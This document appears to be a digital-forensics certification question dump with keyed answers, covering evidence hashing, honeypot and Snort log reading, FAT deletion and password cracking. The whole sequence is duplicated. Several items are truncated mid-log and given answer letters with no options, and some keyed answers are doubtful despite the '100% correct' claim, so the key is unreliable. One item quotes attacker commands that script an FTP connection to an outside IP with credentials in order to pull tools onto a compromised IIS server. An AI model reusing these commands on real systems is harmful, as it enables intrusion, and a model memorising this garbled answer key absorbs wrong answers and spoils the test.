ECSA Questions And Answers 100% Correct
Latest Update
You work in the computer forensics lab of a state police agency. You are working on a
high profile criminal case and have, to this point, followed every applicable procedure;
your boss, nevertheless remains apprehensive that the defense attorney may question
whether evidence has been changed while at the lab. What do you do to prove the
evidence is the same as it was when it first came into the lab?
A. Hash evidence by means of an MD5 and compare to original MD5 taken
when evidence originally came into lab
B. Hash evidence using an MD5 and compare to the standard database developed by
NIST
C. there is no reason to worry about this possible claim because state labs are certified
D. sign a statement attesting that the evidence is the same as it was when it entered the
lab - ANSWER A
Log in the box provided and study the log below and answer the following question: Apr
24 14:46:46 [4663]:
spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]:
IDS27/FIN Scan:
194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]:
IDS/DNS-version-query:
212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]:
IDS213/ftp-passwd-retrieval:
194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan:
PORTSCAN
DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query:
63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 [5875]:
IDS277/DNS-version-query:
63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query:
212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]:
,IDS230/web-cgi-space-wildcard:
198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]:
IDS212/dns-zone-transfer:
38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [62 - ANSWER A
This is important when monitoring for both intrusion and security events across multiple
computers. Synchronized time allows an administrator to reconstruct what happened
during an attack against multiple computers. Without synchronized time, it is very
difficult to know precisely when certain events occurred and how events interweave.
What is the name of the service used to synchronize time among multiple computers?
A. Universal Time Set
B. Network Time Protocol
C. SyncTime Service
D. Time-Sync Protocol - ANSWER B
When investigating an apparent e-mail crime, which of the following is your first step in
this investigation?
A. Track the IP address to the source
B. Type a report
C. Determine if a crime has actually been committed
D. Obtain the evidence - ANSWER A
If the suspect computer is located in an area which may have dangerous chemicals, you
should have to:
A. coordinate with the HAZMAT team
B. find a method to collect the suspect computer
C. treat the suspect machine as contaminated
D. do not enter alone - ANSWER A
Following is an extract of a honeypot log. It records events over three days. There are a
few attempts at intrusion; a couple of them even succeed. The goal of this question is to
verify that the student can read basic information out of log entries and also interpret
,the nature of the attack.
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24
18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24
19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25
08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25
02:08:07
[5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25
02:08:07
[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25
02:38:17
[5875]: ID - ANSWER A
What happens when a file is deleted by a Microsoft operating system using the FAT file
system?
A. only the reference to the file is removed from the FAT
B. the file is erased and cannot be recovered
C. a copy of the file is stored and the original file is erased
D. the file is erased but can be recovered - ANSWER A
The following excerpt is from a honeypot log was hosted at laB. wiretrip.net. Snort
reported Unicode attacks originating from 213.116.251.162. The File Permission
Canonicalization vulnerability UNICODE attack allows running scripts in arbitrary
folders, which do not normally have the privilege to run scripts. He tries a Unicode
attack and eventually gets to view the boot.ini. Then, he switches into playing with RDS
via msadcs.dll. This RDS vulnerability allows an attacker to construct SQL statements
that will execute shell commands like - CMD. EXE on the IIS server. He does a quick
query to determine if such a directory is there and a query to msadcs.dll which would
determine if it's operational. The attacker builds a RDS query that results in the run
commands shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
, "cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo
haxedj00 >>ftpcom"
"cmd1.exe /c ec - ANSWER C
You are reviewing web logs and find that entry exists for resource not found within the
file of HTTP status code. What is the actual error code you would see in the log for
resource not found?
A. 202
B. 404
C. 505
D. 909 - ANSWER B
You have been called in to help the police investigate an alleged drug dealer. The police
searched the suspect's house after obtaining a warrant and found a floppy disk in the
suspect's bedroom. The floppy contains several files, but they appear to be password
protected. What are two common techniques that password cracking programs utilize
to obtain the password?
A. Minimum force and library attack
B. Brute Force and dictionary Attack
C. Maximum force and thesaurus Attack
D. Minimum force and appendix Attack - ANSWER B
When doing an analysis of a hard disk without a write-blocker you do not want to boot up
windows because Windows will write data to the:
A. Recycle Bin
B. MSDOS.sys
C. BIOS
D. Case files - ANSWER A
It is suspected that the employee stole proprietary information owned by the company,
Latest Update
You work in the computer forensics lab of a state police agency. You are working on a
high profile criminal case and have, to this point, followed every applicable procedure;
your boss, nevertheless remains apprehensive that the defense attorney may question
whether evidence has been changed while at the lab. What do you do to prove the
evidence is the same as it was when it first came into the lab?
A. Hash evidence by means of an MD5 and compare to original MD5 taken
when evidence originally came into lab
B. Hash evidence using an MD5 and compare to the standard database developed by
NIST
C. there is no reason to worry about this possible claim because state labs are certified
D. sign a statement attesting that the evidence is the same as it was when it entered the
lab - ANSWER A
Log in the box provided and study the log below and answer the following question: Apr
24 14:46:46 [4663]:
spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]:
IDS27/FIN Scan:
194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]:
IDS/DNS-version-query:
212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]:
IDS213/ftp-passwd-retrieval:
194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan:
PORTSCAN
DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query:
63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 [5875]:
IDS277/DNS-version-query:
63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query:
212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]:
,IDS230/web-cgi-space-wildcard:
198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]:
IDS212/dns-zone-transfer:
38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [62 - ANSWER A
This is important when monitoring for both intrusion and security events across multiple
computers. Synchronized time allows an administrator to reconstruct what happened
during an attack against multiple computers. Without synchronized time, it is very
difficult to know precisely when certain events occurred and how events interweave.
What is the name of the service used to synchronize time among multiple computers?
A. Universal Time Set
B. Network Time Protocol
C. SyncTime Service
D. Time-Sync Protocol - ANSWER B
When investigating an apparent e-mail crime, which of the following is your first step in
this investigation?
A. Track the IP address to the source
B. Type a report
C. Determine if a crime has actually been committed
D. Obtain the evidence - ANSWER A
If the suspect computer is located in an area which may have dangerous chemicals, you
should have to:
A. coordinate with the HAZMAT team
B. find a method to collect the suspect computer
C. treat the suspect machine as contaminated
D. do not enter alone - ANSWER A
Following is an extract of a honeypot log. It records events over three days. There are a
few attempts at intrusion; a couple of them even succeed. The goal of this question is to
verify that the student can read basic information out of log entries and also interpret
,the nature of the attack.
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24
18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24
19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25
08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25
02:08:07
[5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25
02:08:07
[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25
02:38:17
[5875]: ID - ANSWER A
What happens when a file is deleted by a Microsoft operating system using the FAT file
system?
A. only the reference to the file is removed from the FAT
B. the file is erased and cannot be recovered
C. a copy of the file is stored and the original file is erased
D. the file is erased but can be recovered - ANSWER A
The following excerpt is from a honeypot log was hosted at laB. wiretrip.net. Snort
reported Unicode attacks originating from 213.116.251.162. The File Permission
Canonicalization vulnerability UNICODE attack allows running scripts in arbitrary
folders, which do not normally have the privilege to run scripts. He tries a Unicode
attack and eventually gets to view the boot.ini. Then, he switches into playing with RDS
via msadcs.dll. This RDS vulnerability allows an attacker to construct SQL statements
that will execute shell commands like - CMD. EXE on the IIS server. He does a quick
query to determine if such a directory is there and a query to msadcs.dll which would
determine if it's operational. The attacker builds a RDS query that results in the run
commands shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
, "cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo
haxedj00 >>ftpcom"
"cmd1.exe /c ec - ANSWER C
You are reviewing web logs and find that entry exists for resource not found within the
file of HTTP status code. What is the actual error code you would see in the log for
resource not found?
A. 202
B. 404
C. 505
D. 909 - ANSWER B
You have been called in to help the police investigate an alleged drug dealer. The police
searched the suspect's house after obtaining a warrant and found a floppy disk in the
suspect's bedroom. The floppy contains several files, but they appear to be password
protected. What are two common techniques that password cracking programs utilize
to obtain the password?
A. Minimum force and library attack
B. Brute Force and dictionary Attack
C. Maximum force and thesaurus Attack
D. Minimum force and appendix Attack - ANSWER B
When doing an analysis of a hard disk without a write-blocker you do not want to boot up
windows because Windows will write data to the:
A. Recycle Bin
B. MSDOS.sys
C. BIOS
D. Case files - ANSWER A
It is suspected that the employee stole proprietary information owned by the company,